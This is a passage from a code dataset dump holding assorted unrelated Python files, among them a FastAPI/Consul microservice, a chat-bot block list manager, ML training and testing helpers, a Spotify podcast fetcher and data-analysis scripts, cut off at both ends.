(ar)\n\n","sub_path":"Rio.py","file_name":"Rio.py","file_ext":"py","file_size_in_byte":382,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"222702400","text":"import configparser\n\nimport netifaces\nimport requests\nfrom consul import Consul, Check\nfrom fastapi import FastAPI\nfrom lorem.text import TextLorem\n\n\nconsul_port = 8500\nservice_name = \"service1\"\nservice_port = 8010\n\n\ndef get_ip():\n config_parser = configparser.ConfigParser()\n config_file = \"config.ini\"\n config_parser.read(config_file)\n interface_name = config_parser['NETWORK']['interface']\n ip = netifaces.ifaddresses(interface_name)[netifaces.AF_INET][0][\"addr\"]\n return ip\n\n\ndef register_to_consul():\n consul = Consul(host=\"consul\", port=consul_port)\n\n agent = consul.agent\n\n service = agent.service\n\n ip = get_ip()\n\n check = Check.http(f\"http://{ip}:{service_port}/\", interval=\"10s\", timeout=\"5s\", deregister=\"1s\")\n\n service.register(service_name, service_id=service_name, address=ip, port=service_port, check=check)\n\n\ndef get_service(service_id):\n consul = Consul(host=\"consul\", port=consul_port)\n\n agent = consul.agent\n\n service_list = agent.services()\n\n service_info = service_list[service_id]\n\n return service_info['Address'], service_info['Port']\n\n\napp = FastAPI()\n\nregister_to_consul()\n\n\n@app.get(\"/\")\ndef index():\n return \"Service1\"\n\n\n@app.get(\"/sentence-dependent\")\ndef get_sentence_using_service_2():\n address, port = get_service(\"service2\")\n\n words = requests.get(f\"http://{address}:{port}/words\").json()\n\n words = words[\"words\"]\n\n lorem = TextLorem(words=words)\n\n return {\"sentence\": lorem.sentence()}\n\n\n@app.get(\"/sentence-independent\")\ndef get_sentence_using_own_words():\n lorem = TextLorem()\n\n return {\"sentence\": lorem.sentence()}\n","sub_path":"src/service1/service1.py","file_name":"service1.py","file_ext":"py","file_size_in_byte":1627,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"239242416","text":"from pathlib import Path\nimport ujson as json\nfrom datetime import datetime, timedelta\nfrom typing import Union\ntry:\n from src.common import logger\nexcept ImportError:\n from loguru import logger\n\n\nblock_groups_file = Path(__file__).parent/\"block_groups.json\"\nblock_users_file = Path(__file__).parent/\"block_users.json\"\n\n\n# block_groups = {} # 忽略群名单\n# block_users = {} # 忽略用户名单\n\n\nif not block_groups_file.exists():\n with block_groups_file.open('w', encoding='utf-8') as j:\n json.dump({}, j, indent=4)\n\nif not block_users_file.exists():\n with block_users_file.open('w', encoding='utf-8') as j:\n json.dump({}, j, indent=4)\n\n\n# with block_groups_file.open(encoding='utf-8') as j:\n# block_groups = json.load(j)\n# with block_users_file.open(encoding='utf-8') as j:\n# block_users = json.load(j)\n\n\nclass Blocker:\n '''\n 控制群与用户的阻塞列表的基类\n 群与用户阻塞规则reason:\n 0: 通用规则,违规封禁���暂不加入解封方式(实际上暂时没有针对群的违规理由,只有针对个人)\n 1:用户规则,用户主动加入阻塞名单,暂不加入解封方式\n 2:用户规则,临时阻塞,6小时限制\n 3: 群规则,由管理员使用off指令禁用,查询时仍然返回false,使用on指令主动解除\n '''\n block_list = {} # 阻塞列表,群与用户的子类会使用不同的列表\n\n def __init__(self, id: int) -> None:\n self.id = str(id)\n self.file = Path() # 文件,用于子类的记录文件\n\n def check_block(self) -> bool:\n '''\n 检测是否为阻塞id,True为非阻塞\n '''\n block_ls = self.__class__.block_list\n # reason为2根据时间解禁,其他返回false,未禁止返回true\n if self.id in block_ls:\n if block_ls[self.id]['reason'] != 2:\n return False\n else:\n add_time = datetime.strptime(block_ls[self.id]['add_time'], \"%Y-%m-%d %H:%M:%S\")\n if datetime.now() - add_time < timedelta(hours=2):\n return False\n else:\n self.rm_block()\n return True\n else:\n return True\n\n def add_block(self, reason: int):\n '''\n 群与用户阻塞规则reason:\n 0: 通用规则,违规封禁,暂不加入解封方式(实际上暂时没有针对群的违规理由,只有针对个人)\n 1:用户规则,用户主动加入阻塞名单,暂不加入解封方式\n 2:用户规则,临时阻塞,2小时限制\n 3: 群规则,由管理员使用off指令禁用,查询时仍然返回false,使用on指令主动解除\n 可能会根据原因加入解封规则\n '''\n add_time = datetime.now().strftime(\"%Y-%m-%d %H:%M:%S\")\n data = {\n 'reason': reason,\n 'add_time': add_time\n }\n self.__class__.block_list[self.id] = data\n with self.file.open('w', encoding='utf-8') as j:\n json.dump(self.__class__.block_list, j, indent=4)\n\n def rm_block(self):\n '''\n 移出阻塞列表\n '''\n block_ls = self.__class__.block_list\n del block_ls[self.id]\n with self.file.open('w', encoding='utf-8') as j:\n json.dump(self.__class__.block_list, j, indent=4)\n\n \nclass Group_Blocker(Blocker):\n '''\n 管理阻塞群组的类 ※gid会被转化为str,查询时要注意\n '''\n with block_groups_file.open(encoding='utf-8') as j:\n block_list = json.load(j)\n\n def __init__(self, gid: int) -> None:\n self.id = str(gid)\n self.file = block_groups_file\n\n def turn_on(self) -> bool:\n '''\n 当reason为3时可调用此解禁方式,解禁同时返回true\n 当reason不为3时不予解禁并且返回false\n '''\n if self.__class__.block_list[self.id]['reason'] == 3:\n self.rm_block()\n logger.info(f'Remove group {self.id} from block list')\n return True\n else:\n logger.info(f'Failed to unblock group {self.id} , reason: {self.__class__.block_list[self.id][\"reason\"]}')\n return False\n\n\nclass User_Blocker(Blocker):\n '''\n 管理阻塞用户的类 ※uid会被转化为str,查询时要注意\n '''\n with block_users_file.open(encoding='utf-8') as j:\n block_list = json.load(j)\n\n def __init__(self, uid: int) -> None:\n self.id = str(uid)\n self.file = block_users_file\n\n\n#——————白名单群组——————\n\n\nenable_groups_file = Path(__file__).parent/\"enable_groups.json\"\n\n\nif not enable_groups_file.exists():\n with enable_groups_file.open('w', encoding='utf-8') as j:\n json.dump({}, j, indent=4)\n\n\nclass Enable_Group:\n \"\"\"白名单群组,用作授权管理,也防止被拉入陌生群\"\"\"\n\n with enable_groups_file.open(encoding='utf-8') as j:\n enable_groups : dict = json.load(j)\n\n def __init__(self, gid: Union[int, str]) -> None:\n self.gid = str(gid)\n\n def check_enable(self, *, check_date: bool=False) -> bool:\n \"\"\"检查是白名单群,普通情况下不会检查过期时间\n\n Args:\n check_date (bool, optional): 使用此参数检查是否授权已到期. Defaults to False.\n\n Returns:\n bool: 通过结果\n \"\"\"\n\n if not check_date:\n if self.gid in self.__class__.enable_groups:\n return True\n else:\n return False\n else:\n # TODO: 检查到期时间\n pass\n \n def approve(self, term: int):\n \"\"\"授权群使用本bot\n\n Args:\n term (int): 授权天数\n\n Returns:\n bool: 授权是否成功,如果已经在授权名单中则返回False\n \"\"\"\n if self.gid in self.__class__.enable_groups:\n logger.warning(f'Group {self.gid} has approved')\n return False\n else:\n data = {\n 'authorize_time': datetime.now().strftime(\"%Y-%m-%d %H:%M:%S\"),\n 'lease_term': term\n }\n self.__class__.enable_groups[self.gid] = data\n with enable_groups_file.open('w', encoding='utf-8') as j:\n json.dump(self.__class__.enable_groups, j, indent=4)\n logger.info(f'Approve group {self.gid} with {term} days')\n return True\n\n def renewal(self, term: int):\n \"\"\"续期许可证,如果还未开通则会运行授权函数\n\n Args:\n term (int): 续期天数\n \"\"\"\n if self.gid not in self.__class__.enable_groups:\n logger.warning(f'Group {self.gid} never approved, will run aprroving program')\n self.approve(term)\n else:\n self.__class__.enable_groups[self.gid]['lease_term'] += term\n with enable_groups_file.open('w', encoding='utf-8') as j:\n json.dump(self.__class__.enable_groups, j, indent=4)\n logger.info(f'Renew group {self.gid} with {term} days')\n\n\nif __name__ == \"__main__\":\n blocker1 = User_Blocker(112)\n blocker1.rm_block()\n print(blocker1.check_block())","sub_path":"src/common/verify.py","file_name":"verify.py","file_ext":"py","file_size_in_byte":7240,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"356362838","text":"# coding: utf-8\n\n\"\"\"Provide utils to test ramp-kits.\"\"\"\nfrom __future__ import print_function\n\nimport os\nfrom subprocess import call\nimport imp\nfrom os.path import join, abspath\n\nimport numpy as np\nimport cloudpickle as pickle\n\n\ndef _delete_line_from_file(f_name, line_to_delete):\n with open(f_name, \"r+\") as f:\n lines = f.readlines()\n f.seek(0)\n for line in lines:\n if line != line_to_delete:\n f.write(line)\n f.truncate()\n\n\ndef execute_notebook(ramp_kit_dir='.'):\n problem_name = abspath(ramp_kit_dir).split('/')[-1]\n print('Testing if the notebook can be executed')\n call(\n 'jupyter nbconvert --execute {}/{}_starting_kit.ipynb '.format(\n ramp_kit_dir, problem_name) +\n '--ExecutePreprocessor.kernel_name=$IPYTHON_KERNEL ' +\n '--ExecutePreprocessor.timeout=600', shell=True)\n\n\ndef convert_notebook(ramp_kit_dir='.'):\n problem_name = abspath(ramp_kit_dir).split('/')[-1]\n print('Testing if the notebook can be converted to html')\n call('jupyter nbconvert --to html {}/{}_starting_kit.ipynb'.format(\n ramp_kit_dir, problem_name), shell=True)\n _delete_line_from_file(\n '{}/{}_starting_kit.html'.format(ramp_kit_dir, problem_name),\n '\\n')\n\n\ndef assert_notebook(ramp_kit_dir='.'):\n print('----------------------------')\n convert_notebook(ramp_kit_dir)\n execute_notebook(ramp_kit_dir)\n\n\ndef assert_read_problem(ramp_kit_dir='.'):\n problem = imp.load_source('', join(ramp_kit_dir, 'problem.py'))\n return problem\n\n\ndef assert_title(ramp_kit_dir='.'):\n problem = assert_read_problem(ramp_kit_dir)\n print('Testing {}'.format(problem.problem_title))\n\n\ndef assert_data(ramp_kit_dir='.', ramp_data_dir='.'):\n problem = assert_read_problem(ramp_kit_dir)\n print('Reading train and test files from {}/data ...'.format(\n ramp_data_dir))\n X_train, y_train = problem.get_train_data(path=ramp_data_dir)\n X_test, y_test = problem.get_test_data(path=ramp_data_dir)\n return X_train, y_train, X_test, y_test\n\n\ndef assert_cv(ramp_kit_dir='.', ramp_data_dir='.'):\n problem = assert_read_problem(ramp_kit_dir)\n X_train, y_train = problem.get_train_data(path=ramp_data_dir)\n print('Reading cv ...')\n cv = list(problem.get_cv(X_train, y_train))\n return cv\n\n\ndef assert_score_types(ramp_kit_dir='.'):\n problem = assert_read_problem(ramp_kit_dir)\n score_types = problem.score_types\n return score_types\n\n\ndef assert_submission(ramp_kit_dir='.', ramp_data_dir='.',\n submission='starting_kit'):\n \"\"\"Helper to test a submission from a ramp-kit.\n\n Parameters\n ----------\n ramp_kit_dir : str, (default='.')\n The directory of the ramp-kit to be tested for submission.\n\n ramp_data_dir : str, (default='.')\n The directory of the data\n\n submission_name : str, (default='starting_kit')\n The name of the submission to be tested.\n\n Returns\n -------\n None\n\n \"\"\"\n problem = assert_read_problem(ramp_kit_dir)\n assert_title(ramp_kit_dir)\n X_train, y_train, X_test, y_test = assert_data(ramp_kit_dir, ramp_data_dir)\n cv = assert_cv(ramp_kit_dir, ramp_data_dir)\n score_types = assert_score_types(ramp_kit_dir)\n print('Training {}/submissions/{} ...'.format(\n ramp_kit_dir, submission))\n module_path = join(ramp_kit_dir, 'submissions', submission)\n train_train_scoress = np.empty((len(cv), len(score_types)))\n train_valid_scoress = np.empty((len(cv), len(score_types)))\n test_scoress = np.empty((len(cv), len(score_types)))\n for fold_i, (train_is, valid_is) in enumerate(cv):\n trained_workflow = problem.workflow.train_submission(\n module_path, X_train, y_train, train_is=train_is)\n\n # try:\n # model_file = join(module_path, 'model.pkl')\n # # Mehdi's hack to get the trained_workflow (which includes\n # # imported files using imp.load_source) pickled\n # trained_workflow.__class__.__module__ = '__main__'\n # with open(model_file, 'wb') as pickle_file:\n # pickle.dump(trained_workflow, pickle_file)\n # with open(model_file, 'r') as pickle_file:\n # trained_workflow = pickle.load(pickle_file)\n # os.remove(model_file)\n # except Exception as e:\n # print(\"Warning: model can't be pickled.\")\n # print(e)\n\n y_pred_train = problem.workflow.test_submission(\n trained_workflow, X_train)\n predictions_train_train = problem.Predictions(\n y_pred=y_pred_train[train_is])\n ground_truth_train_train = problem.Predictions(\n y_true=y_train[train_is])\n predictions_train_valid = problem.Predictions(\n y_pred=y_pred_train[valid_is])\n ground_truth_train_valid = problem.Predictions(\n y_true=y_train[valid_is])\n\n y_pred_test = problem.workflow.test_submission(\n trained_workflow, X_test)\n predictions_test = problem.Predictions(y_pred=y_pred_test)\n ground_truth_test = problem.Predictions(y_true=y_test)\n\n print('CV fold {}'.format(fold_i))\n for score_type_i, score_type in enumerate(score_types):\n score = score_type.score_function(\n ground_truth_train_train, predictions_train_train)\n train_train_scoress[fold_i, score_type_i] = score\n print('\\ttrain {} = {}'.format(\n score_type.name, round(score, score_type.precision)))\n\n score = score_type.score_function(\n ground_truth_train_valid, predictions_train_valid)\n train_valid_scoress[fold_i, score_type_i] = score\n print('\\tvalid {} = {}'.format(\n score_type.name, round(score, score_type.precision)))\n\n score = score_type.score_function(\n ground_truth_test, predictions_test)\n test_scoress[fold_i, score_type_i] = score\n print('\\ttest {} = {}'.format(\n score_type.name, round(score, score_type.precision)))\n\n print('----------------------------')\n means = train_train_scoress.mean(axis=0)\n stds = train_train_scoress.std(axis=0)\n for mean, std, score_type in zip(means, stds, score_types):\n print('train {} = {} ± {}'.format(\n score_type.name, round(mean, score_type.precision),\n round(std, score_type.precision + 1)))\n\n means = train_valid_scoress.mean(axis=0)\n stds = train_valid_scoress.std(axis=0)\n for mean, std, score_type in zip(means, stds, score_types):\n print('valid {} = {} ± {}'.format(\n score_type.name, round(mean, score_type.precision),\n round(std, score_type.precision + 1)))\n\n means = test_scoress.mean(axis=0)\n stds = test_scoress.std(axis=0)\n for mean, std, score_type in zip(means, stds, score_types):\n print('test {} = {} ± {}'.format(\n score_type.name, round(mean, score_type.precision),\n round(std, score_type.precision + 1)))\n","sub_path":"rampwf/utils/testing.py","file_name":"testing.py","file_ext":"py","file_size_in_byte":7089,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"295347579","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Tue Apr 24 14:24:25 2018\n\n@author: dav\n\"\"\"\n\nimport matplotlib.pyplot as plt\nimport matplotlib.ticker as mticker\nimport cartopy.crs as ccrs\n\nfrom cartopy.mpl.gridliner import lon_formatter, lat_formatter\n\n\nax = plt.axes(projection=ccrs.Mercator())\nax.coastlines()\n\ngl = ax.gridlines(crs=ccrs.PlateCarree(), draw_labels=True,\n linewidth=2, color='gray', alpha=0.5, linestyle='--')\ngl.xlabels_top = False\ngl.ylabels_left = False\ngl.xlines = False\ngl.xlocator = mticker.FixedLocator([-180, -45, 0, 45, 180])\ngl.xformatter = lon_formatter(\"DMS\")\ngl.yformatter = lat_formatter(\"DMS\")\ngl.xlabel_style = {'size': 15, 'color': 'gray'}\ngl.xlabel_style = {'color': 'red', 'weight': 'bold'}\n\nplt.show()\n\n","sub_path":"latlon_2.py","file_name":"latlon_2.py","file_ext":"py","file_size_in_byte":771,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"508731511","text":"# app/weather_service.py\nimport os\nfrom dotenv import load_dotenv\nimport spotipy\nimport sys\nfrom spotipy.oauth2 import SpotifyClientCredentials\nimport spotipy.util as util\nload_dotenv()\nimport requests\nimport datetime\nimport datetime\n\n# Date \n\ny = datetime.datetime.now()\ndate_today = str(y.strftime(\"%Y-%m-%d\"))\ntoday = datetime.date.today()\nyesterday = str(today - datetime.timedelta(days=1))\n\nprint(yesterday)\nprint(date_today)\n\n\n\nSPOTIPY_CLIENT_ID = os.getenv(\"SPOTIPY_CLIENT_ID\")\nSPOTIPY_CLIENT_SECRET = os.getenv(\"SPOTIPY_CLIENT_SECRET\")\nSPOTIPY_REDIRECT_URI = os.getenv(\"SPOTIPY_REDIRECT_URI\")\nusername = os.getenv(\"username\")\n\nscope = 'user-library-read playlist-modify-public'\n\nutil.prompt_for_user_token(username,\n scope,\n SPOTIPY_CLIENT_ID,\n SPOTIPY_CLIENT_SECRET,\n SPOTIPY_REDIRECT_URI)\n\ntoken = util.prompt_for_user_token(username, scope)\n\n\nif token:\n sp = spotipy.Spotify(auth=token)\n results = sp.current_user_saved_shows()\n items = results[\"items\"]\n #print(items)\nelse:\n print(\"Can't get token for\", username)\n\n#print(results)\n# 'spotify:show:5fRBo7ROBQNq8IAavbO64H'\n\n\nID_LIST = [p[\"show\"][\"id\"] for p in items]\nepisodes = []\nfor x in ID_LIST:\n sodes = sp.show(x)\n episodes.append(sodes)\n\n\n#recent_ep_uri = [ sub['uri'] for sub in recent_releases ] \n\n#Podcast Desdcription \n#for q in episodes:\n# episode_info = [q['description'] for q in episodes]\n# #print(episode_info)\n\n\n#Remove Show Meta Data\n\n\nshow_items = [p[\"episodes\"][\"items\"] for p in episodes]\n#Get Most Recent \nrecent_releases = [item[0] for item in show_items]\nnew_release = [b for b in recent_releases if str(b[\"release_date\"]) == yesterday or date_today]\nrecent_ep_uris = [ sub['id'] for sub in new_release] \nrecent_descriptions = [ sub['description'] for sub in recent_releases ] \nrecent_show_titles= [ sub['description'] for sub in recent_releases ] \nepisode_dates = [ sub['release_date'] for sub in recent_releases ] \nprint(recent_ep_uris)\n\n#newly_released_list = []\n#new_release = [b for b in recent_releases if str(b[\"release_date\"]) == \"2020-06-27\" or \"2020-06-27\"]\n#newly_released_list.append(new_release)\n#print(recent_releases)\n#print(new_release)\n#print(episode_dates)\n\n#print(newly_released_list)\n\n#print(*recent_descriptions, sep='\\n')\n\n#print(episodes)\n\n# Get Descriptions \n\n\n#FULL META DATA FOR NEW EPS\n\n\n\nnew_episodes = []\nfor x in recent_ep_uris:\n sodes = sp.episode(x)\n new_episodes.append(sodes)\n#print(new_episodes)\n\n\n#EPISODE TITLE and Description List \nfor q in new_episodes:\n episode_info = [q['show'][\"name\"] + \":\" + \" \" + q['name'] + \" \" + q['description'] for q in new_episodes]\n #show_titles = str([q['show'][\"name\"] for q in new_episodes])\n#print(show_titles)\n#print(*episode_info, sep = \"\\n\")\n\n\n","sub_path":"Podcast_App/podcast_check.py","file_name":"podcast_check.py","file_ext":"py","file_size_in_byte":2846,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"21239157","text":"def get_alert_level(obj_package):\n \"\"\"\n determines the alert level basis the current location vs the destination\n of the given package\n if the package is at its destination, the level is L1, else, L2 \n \"\"\"\n if (obj_package.get('cn', '') in obj_package.cs.get('sl', '') and\n (obj_package.get('cn', None))):\n level = u'L1'\n else:\n level = u'L2'\n \n return level\n","sub_path":"package/alerts.py","file_name":"alerts.py","file_ext":"py","file_size_in_byte":411,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"29027489","text":"# coding: utf-8\n__author__ = 'shiyue'\n\n\"\"\"\nYou are playing the following Nim Game with your friend: There is a heap of stones on the table, each time one of you\ntake turns to remove 1 to 3 stones. The one who removes the last stone will be the winner.\nYou will take the first turn to remove the stones.\nBoth of you are very clever and have optimal strategies for the game.\nWrite a function to determine whether you can win the game given the number of stones in the heap.\n\nFor example, if there are 4 stones in the heap, then you will never win the game: no matter 1, 2, or 3 stones\nyou remove, the last stone will always be removed by your friend.\n\nHint:\n If there are 5 stones in the heap, could you figure out a way to remove the stones such that\n you will always be the winner?\n\"\"\"\nimport random\n\n\nclass Solution(object):\n def canWinNim(self, n):\n \"\"\"\n :type n: int\n :rtype: bool\n \"\"\"\n if n % 4 == 0:\n return False\n else:\n return True\n\n def simulateWin(self, n):\n \"\"\"\n If n % 4 == 0, there is no way to win.\n But else, the win strategy is each time left m stones, m % 4 == 0.\n :param n: the num of stones\n :return: a possible solution to win.\n \"\"\"\n solution_of_a = []\n solution_of_b = []\n while n > 0:\n ma = n % 4\n solution_of_a.append(ma)\n n -= ma\n if n == 0:\n break\n mb = random.choice([1, 2, 3])\n solution_of_b.append(mb)\n n -= mb\n return solution_of_a, solution_of_b\n\n\nif __name__ == '__main__':\n print(Solution().simulateWin(10))\n","sub_path":"easy/NimGame.py","file_name":"NimGame.py","file_ext":"py","file_size_in_byte":1674,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"10272911","text":"# coding=utf-8\nimport requests\nimport json\nimport configparser\nimport logging\n\nparser = configparser.ConfigParser()\nparser.read(\"plugins/config.ini\")\n\nlog = logging.getLogger(__name__)\nlog.setLevel(logging.INFO)\n\n\nclass POST:\n def __init__(self, **kwargs):\n self.client = kwargs.get(\"client\")\n\n async def on_server_join(self, server):\n amount = len(self.client.servers)\n token = parser.get(\"bots.discord.pw\", \"token\")\n\n self.upload(amount, token)\n log.info(\"Updated guild count: {} (joined {})\".format(amount, server.name))\n\n @staticmethod\n def upload(num, token):\n url = \"https://bots.discord.pw/api/bots/:user_id/stats/\".replace(\":user_id\", \"171633949532094464\")\n payload = {\"server_count\": num}\n head = {\n \"Content-Type\": \"application/json\",\n \"Authorization\": str(token)\n }\n\n requests.post(url, data=json.dumps(payload), headers=head)\n return True\n\n\nclass NanoPlugin:\n _name = \"POST module for bots.discord.pw\"\n _version = 0.1\n\n handler = POST\n events = {\n \"on_server_join\": 9\n }\n","sub_path":"plugins/POSTServerCount.py","file_name":"POSTServerCount.py","file_ext":"py","file_size_in_byte":1116,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"163229292","text":"import numpy as np\nimport pandas as pd\nfrom sklearn.pipeline import Pipeline\nfrom sklearn.preprocessing import StandardScaler\nfrom sklearn.decomposition import PCA\nfrom sklearn.ensemble import RandomForestClassifier\nfrom models.data_loader import DataLoader\nfrom sklearn.model_selection import GridSearchCV\nfrom sklearn.metrics import classification_report, confusion_matrix\nimport time\n\n\nif __name__ == '__main__':\n start_time = time.time()\n # We learned from `exploring_data.ipynb` that PCA with 8 principal components is optimal.\n n_components = 8\n train_prop = 0.8\n\n # Random state to allow for this to be deterministic.\n random_state = np.random.RandomState(42069)\n\n # Build the model pipeline\n print(\"Creating the model pipeline...\")\n model_pipeline = Pipeline(steps=[\n ('standardization', StandardScaler()),\n ('pca', PCA(n_components=n_components, random_state=random_state)),\n ('classifier', RandomForestClassifier(random_state=random_state))\n ])\n\n print(\"Loading the data...\")\n dl = DataLoader('data/winequality-red.csv', random_state=random_state)\n # 20% test, 72% train, 8% validate\n X_train, X_test, y_train, y_test = dl.train_test_split(test_prop=(1.0-train_prop))\n\n N_train, _ = X_train.shape\n d = n_components\n\n parameter_grid = {\n 'classifier__n_estimators': np.linspace(50, 500, 10, dtype=int),\n 'classifier__max_depth': np.append(np.linspace(d**2, d*(d+3), 9), None),\n 'classifier__criterion': ['entropy', 'gini'],\n 'classifier__class_weight': ['balanced_subsample', 'balanced'],\n 'classifier__max_features': [2, 3, 4, 'sqrt'],\n }\n\n # 5-fold validation.\n print(\"Defining the grid search...\")\n grid_search = GridSearchCV(model_pipeline, param_grid=parameter_grid, scoring='f1_weighted', n_jobs=-2, cv=5)\n\n # Train the model\n print(\"Training the model...\")\n grid_search.fit(X_train, y_train)\n\n print(\"Printing results...\")\n print(f\"Time taken to run the program: {time.time() - start_time}\")\n\n print(\"Best Estimator:\")\n print(\"Parameters: \" + str(grid_search.best_params_))\n print(\"Accuracy: \" + str(grid_search.best_score_))\n\n y_test_pred = grid_search.predict(X_test)\n print(\"Classification report (Test):\")\n print(classification_report(y_test, y_test_pred))\n\n unique_labels = np.unique(y_test)\n\n confusion_mtrx = pd.DataFrame(\n confusion_matrix(y_test, y_test_pred, labels=unique_labels),\n index=[f'true:{i}' for i in unique_labels],\n columns=[f'pred:{i}' for i in unique_labels]\n )\n\n print(confusion_mtrx)","sub_path":"training_RFC.py","file_name":"training_RFC.py","file_ext":"py","file_size_in_byte":2610,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"526506675","text":"\"\"\"Summarize for MLRA, somehow\"\"\"\nfrom __future__ import print_function\nimport sys\n\nfrom pandas.io.sql import read_sql\nimport matplotlib\nmatplotlib.use('agg')\nimport matplotlib.pyplot as plt\nfrom pyiem.util import get_dbconn\n\nLABELS = {\n 36: 'Slopes > 3% to Switchgrass',\n 37: 'Slopes > 6% to Switchgrass',\n 38: 'Slopes > 10% to Switchgrass',\n }\n\n\ndef main(argv):\n \"\"\"Go Main Go\"\"\"\n mlra_id = int(argv[1])\n pgconn = get_dbconn('idep')\n\n mlraxref = read_sql(\"\"\"\n with m as (\n select mlra_id, mlra_name, sum(st_area(geography(geom))) from mlra\n WHERE mlra_id = %s GROUP by mlra_id, mlra_name),\n h as (\n select mlra_id, sum(st_area(geography(st_transform(geom, 4326))))\n from huc12 WHERE scenario = 0 and mlra_id = %s GROUP by mlra_id\n )\n SELECT m.mlra_id, m.mlra_name, h.sum / m.sum * 100. as coverage\n from m JOIN h on (m.mlra_id = h.mlra_id)\n \"\"\", pgconn, params=(mlra_id, mlra_id), index_col='mlra_id')\n\n df = read_sql(\"\"\"\n with myhucs as (\n SELECT huc_12 from huc12 where scenario = 0 and mlra_id = %s\n )\n select r.huc_12, scenario, extract(year from valid)::int as year,\n sum(avg_loss) * 10. as loss, sum(avg_runoff) as runoff,\n sum(avg_delivery) * 10. as delivery\n from results_by_huc12 r JOIN myhucs h on (r.huc_12 = h.huc_12)\n where r.valid >= '2008-01-01' and r.valid < '2017-01-01'\n and scenario in (0, 36, 37, 38)\n GROUP by r.huc_12, year, scenario\n \"\"\", pgconn, params=(mlra_id, ), index_col=None)\n gdf = df.groupby('scenario').mean()\n print(\"%s\\t%.1f\\t%.2f\" % (mlraxref.at[mlra_id, 'mlra_name'],\n mlraxref.at[mlra_id, 'coverage'],\n gdf.at[0, 'delivery']), end='\\t')\n for scenario in range(36, 39):\n delta = gdf.loc[(scenario, )] / gdf.loc[(0, )] * 100.\n print(\"%.2f (%.1f%%)\" % (gdf.at[scenario, 'delivery'], delta['delivery']),\n end='\\t')\n print()\n\n\nif __name__ == '__main__':\n for mlraid in [106, 107, 108, 109, 121, 137, 150, 155, 166, 175,\n 176, 177, 178, 179, 181, 182, 186, 187, 188, 196,\n 197, 204, 205]:\n main([None, mlraid])\n","sub_path":"scripts/switchgrass/mlra_summary_text.py","file_name":"mlra_summary_text.py","file_ext":"py","file_size_in_byte":2198,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"343567977","text":"import numpy as np\n\n\ndef shuffle(data, inplace=False):\n n_x = data.xs.shape[1]\n xs_ys = np.hstack((data.xs, data.ys))\n np.random.shuffle(xs_ys)\n xs = xs_ys[:, :n_x]\n ys = xs_ys[:, n_x:]\n if inplace:\n data.xs, data.ys = xs, ys\n else:\n shuffled_data = data.copy()\n shuffled_data.xs, shuffled_data.ys = xs, ys\n return shuffled_data","sub_path":"tfnn/datasets/shuffle.py","file_name":"shuffle.py","file_ext":"py","file_size_in_byte":377,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"256955514","text":"\"\"\"\n Capstone Project. Code written by Nicolas Bohner.\n Fall term, 2018-2019.\n\"\"\"\n\nimport rosebotics as rb\nimport time\n# Rosebotics: forward fo n seconds\n# Write test code for spin_function\n# ls -- list\n# cd -- change dir\n# python RUN\n\ndef main():\n \"\"\" Runs tests. \"\"\"\n run_tests()\n\n\ndef run_tests():\n \"\"\" Runs various tests. \"\"\"\n# run_test_go_stop()\n test_spin(5)\n test_spin(3)\n\ndef test_spin(n):\n robot.spin('clockwise', n)\n robot.sleep(1)\n robot.spin('counter-clockwise', n)\n\n\ndef run_test_go_stop():\n \"\"\" Tests the go and stop Snatch3rRobot methods. \"\"\"\n robot = rb.Snatch3rRobot()\n\n robot.go(50, 25)\n time.sleep(2)\n robot.stop()\n\n print(robot.right_wheel.get_degrees_spun())\n print(robot.left_wheel.get_degrees_spun())\n robot.left_wheel.reset_degrees_spun(0)\n\n\n time.sleep(2)\n\n robot.go(100, 100)\n time.sleep(3)\n robot.stop(rb.StopAction.COAST.value)\n\n print(robot.right_wheel.get_degrees_spun())\n print(robot.left_wheel.get_degrees_spun())\n\n\nmain()\n","sub_path":"src/DarkNic.py","file_name":"DarkNic.py","file_ext":"py","file_size_in_byte":1051,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"157589567","text":"import pymysql\r\nimport config\r\nimport numpy as np\r\nimport pandas as pd\r\nimport datetime as dt\r\nfrom Misc.foodfie_db.db import connectDB\r\n\r\nSQL = 'Select * from foodfie.Order'\r\ndb_connect = pymysql.connect(host = config.host, port=config.port, user= config.user, password = config.password, db= config.db)\r\n\r\nNOW = dt.datetime.now()\r\ndf1 = pd.read_sql(SQL, db_connect)\r\nrfmTable = df1.groupby('CustomerId').agg({'TotalAmount': np.sum, 'OrderTime': lambda x: (NOW - x.max()).days, 'CustomerId':np.count_nonzero})\r\nrfmTable.rename(columns={'OrderTime':'LastVisited',\r\n 'CustomerId': 'TotalVisit',\r\n }, inplace = True)\r\n#rfmTable.columns = ['LastVisited', 'Frequency','TotalAmount']\r\nprint(rfmTable.head())\r\nquantiles = rfmTable.quantile(q=[0.25, 0.5, 0.75])\r\nquantiles = quantiles.to_dict()\r\n\r\nsegmented_rfm = rfmTable\r\n\r\ndef RScore(x,p,d):\r\n if x <= d[p][0.25]:\r\n return 1\r\n elif x <= d[p][0.50]:\r\n return 2\r\n elif x <= d[p][0.75]:\r\n return 3\r\n else:\r\n return 4\r\n\r\ndef FMScore(x,p,d):\r\n if x <= d[p][0.25]:\r\n return 4\r\n elif x <= d[p][0.50]:\r\n return 3\r\n elif x <= d[p][0.75]:\r\n return 2\r\n else:\r\n return 1\r\n\r\nsegmented_rfm['r_quartile'] = 